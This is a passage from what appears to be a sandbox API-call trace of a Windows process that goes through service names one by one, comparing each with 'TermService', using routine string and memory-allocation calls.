(lpString1="FDResPub", lpString2="TermService") returned -1 [0319.988] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.988] lstrlenW (lpString="fhsvc") returned 5 [0319.988] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.989] lstrlenW (lpString="fhsvc") returned 5 [0319.989] lstrcpyW (in: lpString1=0x3790000, lpString2="fhsvc" | out: lpString1="fhsvc") returned="fhsvc" [0319.989] lstrcmpW (lpString1="fhsvc", lpString2="TermService") returned -1 [0319.989] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.990] lstrlenW (lpString="FontCache") returned 9 [0319.990] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.990] lstrlenW (lpString="FontCache") returned 9 [0319.990] lstrcpyW (in: lpString1=0x3790000, lpString2="FontCache" | out: lpString1="FontCache") returned="FontCache" [0319.990] lstrcmpW (lpString1="FontCache", lpString2="TermService") returned -1 [0319.990] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.991] lstrlenW (lpString="FontCache3.0.0.0") returned 16 [0319.991] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.992] lstrlenW (lpString="FontCache3.0.0.0") returned 16 [0319.992] lstrcpyW (in: lpString1=0x3790000, lpString2="FontCache3.0.0.0" | out: lpString1="FontCache3.0.0.0") returned="FontCache3.0.0.0" [0319.992] lstrcmpW (lpString1="FontCache3.0.0.0", lpString2="TermService") returned -1 [0319.992] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.993] lstrlenW (lpString="gpsvc") returned 5 [0319.993] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.993] lstrlenW (lpString="gpsvc") returned 5 [0319.993] lstrcpyW (in: lpString1=0x3790000, lpString2="gpsvc" | out: lpString1="gpsvc") returned="gpsvc" [0319.993] lstrcmpW (lpString1="gpsvc", lpString2="TermService") returned -1 [0319.993] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.994] lstrlenW (lpString="hidserv") returned 7 [0319.994] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.995] lstrlenW (lpString="hidserv") returned 7 [0319.995] lstrcpyW (in: lpString1=0x3790000, lpString2="hidserv" | out: lpString1="hidserv") returned="hidserv" [0319.995] lstrcmpW (lpString1="hidserv", lpString2="TermService") returned -1 [0319.995] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.996] lstrlenW (lpString="HomeGroupListener") returned 17 [0319.996] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.996] lstrlenW (lpString="HomeGroupListener") returned 17 [0319.996] lstrcpyW (in: lpString1=0x3790000, lpString2="HomeGroupListener" | out: lpString1="HomeGroupListener") returned="HomeGroupListener" [0319.996] lstrcmpW (lpString1="HomeGroupListener", lpString2="TermService") returned -1 [0319.996] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.997] lstrlenW (lpString="HomeGroupProvider") returned 17 [0319.997] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.997] lstrlenW (lpString="HomeGroupProvider") returned 17 [0319.998] lstrcpyW (in: lpString1=0x3790000, lpString2="HomeGroupProvider" | out: lpString1="HomeGroupProvider") returned="HomeGroupProvider" [0319.998] lstrcmpW (lpString1="HomeGroupProvider", lpString2="TermService") returned -1 [0319.998] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.998] lstrlenW (lpString="icssvc") returned 6 [0319.998] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.999] lstrlenW (lpString="icssvc") returned 6 [0319.999] lstrcpyW (in: lpString1=0x3790000, lpString2="icssvc" | out: lpString1="icssvc") returned="icssvc" [0319.999] lstrcmpW (lpString1="icssvc", lpString2="TermService") returned -1 [0319.999] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.000] lstrlenW (lpString="IEEtwCollectorService") returned 21 [0320.000] VirtualAlloc (lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.000] lstrlenW (lpString="IEEtwCollectorService") returned 21 [0320.000] lstrcpyW (in: lpString1=0x3790000, lpString2="IEEtwCollectorService" | out: lpString1="IEEtwCollectorService") returned="IEEtwCollectorService" [0320.000] lstrcmpW (lpString1="IEEtwCollectorService", lpString2="TermService") returned -1 [0320.000] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.001] lstrlenW (lpString="IKEEXT") returned 6 [0320.001] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.001] lstrlenW (lpString="IKEEXT") returned 6 [0320.001] lstrcpyW (in: lpString1=0x3790000, lpString2="IKEEXT" | out: lpString1="IKEEXT") returned="IKEEXT" [0320.001] lstrcmpW (lpString1="IKEEXT", lpString2="TermService") returned -1 [0320.001] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.002] lstrlenW (lpString="iphlpsvc") returned 8 [0320.002] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.003] lstrlenW (lpString="iphlpsvc") returned 8 [0320.003] lstrcpyW (in: lpString1=0x3790000, lpString2="iphlpsvc" | out: lpString1="iphlpsvc") returned="iphlpsvc" [0320.003] lstrcmpW (lpString1="iphlpsvc", lpString2="TermService") returned -1 [0320.003] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.003] lstrlenW (lpString="KeyIso") returned 6 [0320.004] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.004] lstrlenW (lpString="KeyIso") returned 6 [0320.004] lstrcpyW (in: lpString1=0x3790000, lpString2="KeyIso" | out: lpString1="KeyIso") returned="KeyIso" [0320.004] lstrcmpW (lpString1="KeyIso", lpString2="TermService") returned -1 [0320.004] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.005] lstrlenW (lpString="KtmRm") returned 5 [0320.005] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.005] lstrlenW (lpString="KtmRm") returned 5 [0320.005] lstrcpyW (in: lpString1=0x3790000, lpString2="KtmRm" | out: lpString1="KtmRm") returned="KtmRm" [0320.005] lstrcmpW (lpString1="KtmRm", lpString2="TermService") returned -1 [0320.006] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.254] lstrlenW (lpString="LanmanServer") returned 12 [0320.254] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.255] lstrlenW (lpString="LanmanServer") returned 12 [0320.255] lstrcpyW (in: lpString1=0x3790000, lpString2="LanmanServer" | out: lpString1="LanmanServer") returned="LanmanServer" [0320.255] lstrcmpW (lpString1="LanmanServer", lpString2="TermService") returned -1 [0320.255] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.256] lstrlenW (lpString="LanmanWorkstation") returned 17 [0320.256] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.256] lstrlenW (lpString="LanmanWorkstation") returned 17 [0320.256] lstrcpyW (in: lpString1=0x3790000, lpString2="LanmanWorkstation" | out: lpString1="LanmanWorkstation") returned="LanmanWorkstation" [0320.256] lstrcmpW (lpString1="LanmanWorkstation", lpString2="TermService") returned -1 [0320.256] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.257] lstrlenW (lpString="lfsvc") returned 5 [0320.257] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.258] lstrlenW (lpString="lfsvc") returned 5 [0320.258] lstrcpyW (in: lpString1=0x3790000, lpString2="lfsvc" | out: lpString1="lfsvc") returned="lfsvc" [0320.258] lstrcmpW (lpString1="lfsvc", lpString2="TermService") returned -1 [0320.258] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.259] lstrlenW (lpString="LicenseManager") returned 14 [0320.259] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.259] lstrlenW (lpString="LicenseManager") returned 14 [0320.259] lstrcpyW (in: lpString1=0x3790000, lpString2="LicenseManager" | out: lpString1="LicenseManager") returned="LicenseManager" [0320.259] lstrcmpW (lpString1="LicenseManager", lpString2="TermService") returned -1 [0320.259] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.260] lstrlenW (lpString="lltdsvc") returned 7 [0320.260] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.261] lstrlenW (lpString="lltdsvc") returned 7 [0320.261] lstrcpyW (in: lpString1=0x3790000, lpString2="lltdsvc" | out: lpString1="lltdsvc") returned="lltdsvc" [0320.261] lstrcmpW (lpString1="lltdsvc", lpString2="TermService") returned -1 [0320.261] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.262] lstrlenW (lpString="lmhosts") returned 7 [0320.262] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.263] lstrlenW (lpString="lmhosts") returned 7 [0320.263] lstrcpyW (in: lpString1=0x3790000, lpString2="lmhosts" | out: lpString1="lmhosts") returned="lmhosts" [0320.263] lstrcmpW (lpString1="lmhosts", lpString2="TermService") returned -1 [0320.263] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.264] lstrlenW (lpString="LSM") returned 3 [0320.264] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.265] lstrlenW (lpString="LSM") returned 3 [0320.265] lstrcpyW (in: lpString1=0x3790000, lpString2="LSM" | out: lpString1="LSM") returned="LSM" [0320.265] lstrcmpW (lpString1="LSM", lpString2="TermService") returned -1 [0320.265] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.266] lstrlenW (lpString="MapsBroker") returned 10 [0320.266] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.266] lstrlenW (lpString="MapsBroker") returned 10 [0320.266] lstrcpyW (in: lpString1=0x3790000, lpString2="MapsBroker" | out: lpString1="MapsBroker") returned="MapsBroker" [0320.266] lstrcmpW (lpString1="MapsBroker", lpString2="TermService") returned -1 [0320.266] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.267] lstrlenW (lpString="MpsSvc") returned 6 [0320.267] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.268] lstrlenW (lpString="MpsSvc") returned 6 [0320.268] lstrcpyW (in: lpString1=0x3790000, lpString2="MpsSvc" | out: lpString1="MpsSvc") returned="MpsSvc" [0320.268] lstrcmpW (lpString1="MpsSvc", lpString2="TermService") returned -1 [0320.268] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.269] lstrlenW (lpString="MSDTC") returned 5 [0320.269] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.270] lstrlenW (lpString="MSDTC") returned 5 [0320.270] lstrcpyW (in: lpString1=0x3790000, lpString2="MSDTC" | out: lpString1="MSDTC") returned="MSDTC" [0320.270] lstrcmpW (lpString1="MSDTC", lpString2="TermService") returned -1 [0320.270] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.271] lstrlenW (lpString="MSiSCSI") returned 7 [0320.271] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.273] lstrlenW (lpString="MSiSCSI") returned 7 [0320.273] lstrcpyW (in: lpString1=0x3790000, lpString2="MSiSCSI" | out: lpString1="MSiSCSI") returned="MSiSCSI" [0320.273] lstrcmpW (lpString1="MSiSCSI", lpString2="TermService") returned -1 [0320.273] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.273] lstrlenW (lpString="msiserver") returned 9 [0320.273] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.274] lstrlenW (lpString="msiserver") returned 9 [0320.274] lstrcpyW (in: lpString1=0x3790000, lpString2="msiserver" | out: lpString1="msiserver") returned="msiserver" [0320.274] lstrcmpW (lpString1="msiserver", lpString2="TermService") returned -1 [0320.274] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.275] lstrlenW (lpString="NcaSvc") returned 6 [0320.275] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.275] lstrlenW (lpString="NcaSvc") returned 6 [0320.275] lstrcpyW (in: lpString1=0x3790000, lpString2="NcaSvc" | out: lpString1="NcaSvc") returned="NcaSvc" [0320.275] lstrcmpW (lpString1="NcaSvc", lpString2="TermService") returned -1 [0320.275] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.276] lstrlenW (lpString="NcbService") returned 10 [0320.276] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.276] lstrlenW (lpString="NcbService") returned 10 [0320.276] lstrcpyW (in: lpString1=0x3790000, lpString2="NcbService" | out: lpString1="NcbService") returned="NcbService" [0320.276] lstrcmpW (lpString1="NcbService", lpString2="TermService") returned -1 [0320.276] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.277] lstrlenW (lpString="NcdAutoSetup") returned 12 [0320.277] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.277] lstrlenW (lpString="NcdAutoSetup") returned 12 [0320.278] lstrcpyW (in: lpString1=0x3790000, lpString2="NcdAutoSetup" | out: lpString1="NcdAutoSetup") returned="NcdAutoSetup" [0320.278] lstrcmpW (lpString1="NcdAutoSetup", lpString2="TermService") returned -1 [0320.278] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.278] lstrlenW (lpString="Netlogon") returned 8 [0320.278] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.279] lstrlenW (lpString="Netlogon") returned 8 [0320.279] lstrcpyW (in: lpString1=0x3790000, lpString2="Netlogon" | out: lpString1="Netlogon") returned="Netlogon" [0320.279] lstrcmpW (lpString1="Netlogon", lpString2="TermService") returned -1 [0320.279] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.279] lstrlenW (lpString="Netman") returned 6 [0320.279] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.280] lstrlenW (lpString="Netman") returned 6 [0320.280] lstrcpyW (in: lpString1=0x3790000, lpString2="Netman" | out: lpString1="Netman") returned="Netman" [0320.280] lstrcmpW (lpString1="Netman", lpString2="TermService") returned -1 [0320.280] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.281] lstrlenW (lpString="netprofm") returned 8 [0320.281] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.281] lstrlenW (lpString="netprofm") returned 8 [0320.281] lstrcpyW (in: lpString1=0x3790000, lpString2="netprofm" | out: lpString1="netprofm") returned="netprofm" [0320.281] lstrcmpW (lpString1="netprofm", lpString2="TermService") returned -1 [0320.281] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.282] lstrlenW (lpString="NetSetupSvc") returned 11 [0320.282] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.282] lstrlenW (lpString="NetSetupSvc") returned 11 [0320.282] lstrcpyW (in: lpString1=0x3790000, lpString2="NetSetupSvc" | out: lpString1="NetSetupSvc") returned="NetSetupSvc" [0320.282] lstrcmpW (lpString1="NetSetupSvc", lpString2="TermService") returned -1 [0320.282] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.283] lstrlenW (lpString="NetTcpPortSharing") returned 17 [0320.283] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.284] lstrlenW (lpString="NetTcpPortSharing") returned 17 [0320.284] lstrcpyW (in: lpString1=0x3790000, lpString2="NetTcpPortSharing" | out: lpString1="NetTcpPortSharing") returned="NetTcpPortSharing" [0320.284] lstrcmpW (lpString1="NetTcpPortSharing", lpString2="TermService") returned -1 [0320.284] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.284] lstrlenW (lpString="NgcCtnrSvc") returned 10 [0320.284] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.285] lstrlenW (lpString="NgcCtnrSvc") returned 10 [0320.285] lstrcpyW (in: lpString1=0x3790000, lpString2="NgcCtnrSvc" | out: lpString1="NgcCtnrSvc") returned="NgcCtnrSvc" [0320.285] lstrcmpW (lpString1="NgcCtnrSvc", lpString2="TermService") returned -1 [0320.285] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.285] lstrlenW (lpString="NgcSvc") returned 6 [0320.285] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.286] lstrlenW (lpString="NgcSvc") returned 6 [0320.286] lstrcpyW (in: lpString1=0x3790000, lpString2="NgcSvc" | out: lpString1="NgcSvc") returned="NgcSvc" [0320.286] lstrcmpW (lpString1="NgcSvc", lpString2="TermService") returned -1 [0320.286] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.287] lstrlenW (lpString="NlaSvc") returned 6 [0320.287] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.633] lstrlenW (lpString="NlaSvc") returned 6 [0320.633] lstrcpyW (in: lpString1=0x3790000, lpString2="NlaSvc" | out: lpString1="NlaSvc") returned="NlaSvc" [0320.633] lstrcmpW (lpString1="NlaSvc", lpString2="TermService") returned -1 [0320.633] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.634] lstrlenW (lpString="nsi") returned 3 [0320.634] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.634] lstrlenW (lpString="nsi") returned 3 [0320.635] lstrcpyW (in: lpString1=0x3790000, lpString2="nsi" | out: lpString1="nsi") returned="nsi" [0320.635] lstrcmpW (lpString1="nsi", lpString2="TermService") returned -1 [0320.635] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.635] lstrlenW (lpString="ose") returned 3 [0320.635] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.636] lstrlenW (lpString="ose") returned 3 [0320.636] lstrcpyW (in: lpString1=0x3790000, lpString2="ose" | out: lpString1="ose") returned="ose" [0320.636] lstrcmpW (lpString1="ose", lpString2="TermService") returned -1 [0320.636] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.637] lstrlenW (lpString="p2pimsvc") returned 8 [0320.637] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.638] lstrlenW (lpString="p2pimsvc") returned 8 [0320.638] lstrcpyW (in: lpString1=0x3790000, lpString2="p2pimsvc" | out: lpString1="p2pimsvc") returned="p2pimsvc" [0320.638] lstrcmpW (lpString1="p2pimsvc", lpString2="TermService") returned -1 [0320.638] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.638] lstrlenW (lpString="p2psvc") returned 6 [0320.639] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.639] lstrlenW (lpString="p2psvc") returned 6 [0320.639] lstrcpyW (in: lpString1=0x3790000, lpString2="p2psvc" | out: lpString1="p2psvc") returned="p2psvc" [0320.639] lstrcmpW (lpString1="p2psvc", lpString2="TermService") returned -1 [0320.639] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.641] lstrlenW (lpString="PcaSvc") returned 6 [0320.641] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.641] lstrlenW (lpString="PcaSvc") returned 6 [0320.641] lstrcpyW (in: lpString1=0x3790000, lpString2="PcaSvc" | out: lpString1="PcaSvc") returned="PcaSvc" [0320.642] lstrcmpW (lpString1="PcaSvc", lpString2="TermService") returned -1 [0320.642] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.642] lstrlenW (lpString="PeerDistSvc") returned 11 [0320.642] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.643] lstrlenW (lpString="PeerDistSvc") returned 11 [0320.643] lstrcpyW (in: lpString1=0x3790000, lpString2="PeerDistSvc" | out: lpString1="PeerDistSvc") returned="PeerDistSvc" [0320.643] lstrcmpW (lpString1="PeerDistSvc", lpString2="TermService") returned -1 [0320.643] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.643] lstrlenW (lpString="PerfHost") returned 8 [0320.643] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.644] lstrlenW (lpString="PerfHost") returned 8 [0320.644] lstrcpyW (in: lpString1=0x3790000, lpString2="PerfHost" | out: lpString1="PerfHost") returned="PerfHost" [0320.644] lstrcmpW (lpString1="PerfHost", lpString2="TermService") returned -1 [0320.644] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.644] lstrlenW (lpString="PhoneSvc") returned 8 [0320.644] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.645] lstrlenW (lpString="PhoneSvc") returned 8 [0320.645] lstrcpyW (in: lpString1=0x3790000, lpString2="PhoneSvc" | out: lpString1="PhoneSvc") returned="PhoneSvc" [0320.645] lstrcmpW (lpString1="PhoneSvc", lpString2="TermService") returned -1 [0320.645] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.645] lstrlenW (lpString="pla") returned 3 [0320.645] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.646] lstrlenW (lpString="pla") returned 3 [0320.646] lstrcpyW (in: lpString1=0x3790000, lpString2="pla" | out: lpString1="pla") returned="pla" [0320.646] lstrcmpW (lpString1="pla", lpString2="TermService") returned -1 [0320.646] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.647] lstrlenW (lpString="PlugPlay") returned 8 [0320.647] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.647] lstrlenW (lpString="PlugPlay") returned 8 [0320.647] lstrcpyW (in: lpString1=0x3790000, lpString2="PlugPlay" | out: lpString1="PlugPlay") returned="PlugPlay" [0320.647] lstrcmpW (lpString1="PlugPlay", lpString2="TermService") returned -1 [0320.647] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.650] lstrlenW (lpString="PNRPAutoReg") returned 11 [0320.650] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.650] lstrlenW (lpString="PNRPAutoReg") returned 11 [0320.650] lstrcpyW (in: lpString1=0x3790000, lpString2="PNRPAutoReg" | out: lpString1="PNRPAutoReg") returned="PNRPAutoReg" [0320.650] lstrcmpW (lpString1="PNRPAutoReg", lpString2="TermService") returned -1 [0320.650] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.651] lstrlenW (lpString="PNRPsvc") returned 7 [0320.651] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.651] lstrlenW (lpString="PNRPsvc") returned 7 [0320.651] lstrcpyW (in: lpString1=0x3790000, lpString2="PNRPsvc" | out: lpString1="PNRPsvc") returned="PNRPsvc" [0320.651] lstrcmpW (lpString1="PNRPsvc", lpString2="TermService") returned -1 [0320.651] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.652] lstrlenW (lpString="PolicyAgent") returned 11 [0320.652] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.652] lstrlenW (lpString="PolicyAgent") returned 11 [0320.652] lstrcpyW (in: lpString1=0x3790000, lpString2="PolicyAgent" | out: lpString1="PolicyAgent") returned="PolicyAgent" [0320.652] lstrcmpW (lpString1="PolicyAgent", lpString2="TermService") returned -1 [0320.652] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.653] lstrlenW (lpString="Power") returned 5 [0320.653] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.653] lstrlenW (lpString="Power") returned 5 [0320.653] lstrcpyW (in: lpString1=0x3790000, lpString2="Power" | out: lpString1="Power") returned="Power" [0320.653] lstrcmpW (lpString1="Power", lpString2="TermService") returned -1 [0320.653] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.654] lstrlenW (lpString="PrintNotify") returned 11 [0320.654] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.654] lstrlenW (lpString="PrintNotify") returned 11 [0320.654] lstrcpyW (in: lpString1=0x3790000, lpString2="PrintNotify" | out: lpString1="PrintNotify") returned="PrintNotify" [0320.654] lstrcmpW (lpString1="PrintNotify", lpString2="TermService") returned -1 [0320.654] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.655] lstrlenW (lpString="ProfSvc") returned 7 [0320.655] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.655] lstrlenW (lpString="ProfSvc") returned 7 [0320.655] lstrcpyW (in: lpString1=0x3790000, lpString2="ProfSvc" | out: lpString1="ProfSvc") returned="ProfSvc" [0320.655] lstrcmpW (lpString1="ProfSvc", lpString2="TermService") returned -1 [0320.655] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.656] lstrlenW (lpString="QWAVE") returned 5 [0320.656] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.656] lstrlenW (lpString="QWAVE") returned 5 [0320.656] lstrcpyW (in: lpString1=0x3790000, lpString2="QWAVE" | out: lpString1="QWAVE") returned="QWAVE" [0320.656] lstrcmpW (lpString1="QWAVE", lpString2="TermService") returned -1 [0320.656] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0320.656] lstrlenW (lpString="RasAuto") returned 7 [0320.657] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0320.657] lstrlenW (lpString="RasAuto") returned 7 [0320.657] lstrcpyW (in: lpString1=0x3790000, lpString2="RasAuto" | out: lpString1="RasAuto") returned="RasAuto" [0320.657] lstrcmpW (lpString1="RasAuto", lpString2="TermService") returned -1 [0320.657] VirtualFree (lpAddress=0x3790000, dwSize=0x0, 